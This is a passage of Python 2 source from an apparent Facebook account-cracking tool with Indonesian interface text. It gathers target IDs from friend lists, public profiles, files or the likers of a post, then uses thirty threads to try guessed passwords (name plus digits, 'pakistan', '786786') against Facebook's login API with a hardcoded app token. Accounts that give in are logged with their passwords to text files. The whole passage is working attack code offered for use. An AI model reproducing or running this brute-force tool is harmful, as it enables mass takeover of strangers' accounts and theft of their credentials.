oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos5
cek = open("done/usa.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mSelesai ...'
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;95mfile tersimpan \033[1;91m: \033[1;92mdone/usa.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;95mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK PAKISTAN #####
def crack_pakis():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;91m01\033[1;97m} Crack Dari Daftar Teman"
print "\033[1;97m{\033[1;91m02\033[1;97m} Crack Dari Publik/Teman"
print "\033[1;97m{\033[1;91m03\033[1;97m} Crack Dari File"
print "\033[1;97m{\033[1;91m00\033[1;97m} Kembali"
print 50* "\033[1;94m─"
pilih_pakis()
#### PILIH PAKISTAN ####
def pilih_pakis():
teak = raw_input("\033[1;91m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_pakis()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;91m●●● \033[1;97mCRACK PAKISTAN \033[1;91m●●●")
print 50* "\033[1;94m─"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;91m●●● \033[1;97mCRACK PAKISTAN \033[1;91m●●●")
print 50* "\033[1;94m─"
idt = raw_input("\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mID Publik/Teman \033[1;91m:\033[1;92m ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mNama \033[1;91m:\033[1;92m "+op["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;91m[\033[1;97m<Kembali>\033[1;91m]")
crack_pakis()
except requests.exceptions.ConnectionError:
print"\033[1;97m{\033[1;91m!\033[1;97m} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print 50* "\033[1;94m─"
print (" \033[1;91m●●● \033[1;97mCRACK PAKISTAN \033[1;91m●●●")
print 50* "\033[1;94m─"
idlist = raw_input('\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mNama File\033[1;91m :\033[1;92m ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada !'
raw_input("\n\033[1;91m[\033[1;97m<Kembali>\033[1;91m]")
crack_pakis()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_pakis()
print "\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN PAKISTAN #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos1
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos2
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos3
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = ('pakistan')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos4
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos5
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['last_name'].lower()+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos6
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos7 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos7
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos7
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos8 = j['last_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos8
oke = open("done/pakis.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;91m") + j['name']
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;91m") + zowe
print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;91m") + bos8
cek = open("done/pakis.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mSelesai ...'
print"\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mTotal \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;91m"+str(len(cekpoint))
print '\033[1;97m{\033[1;91m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;91mfile tersimpan \033[1;91m: \033[1;92mdone/pakis.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;91mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK LIKES #####
def crack_likes():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;96m●●● \033[1;97mCRACK POSTINGAN GRUP/TEMAN\033[1;96m ●●●")
print 50* "\033[1;94m─"
tez = raw_input("\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m ID Postingan Group/Teman \033[1;91m :\033[1;92m ")
r = requests.get("https://graph.facebook.com/"+tez+"/likes?limit=9999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
jalan('\r\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mMengambil ID \033[1;97m...')
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID Postingan Salah !"
raw_input("\n\033[1;96m[<\033[1;97mKembali>\033[1;96m]")
menu()
print "\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN LIKES #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos1
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos2
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos3
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos4
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = j['last_name'].lower()+'1234'
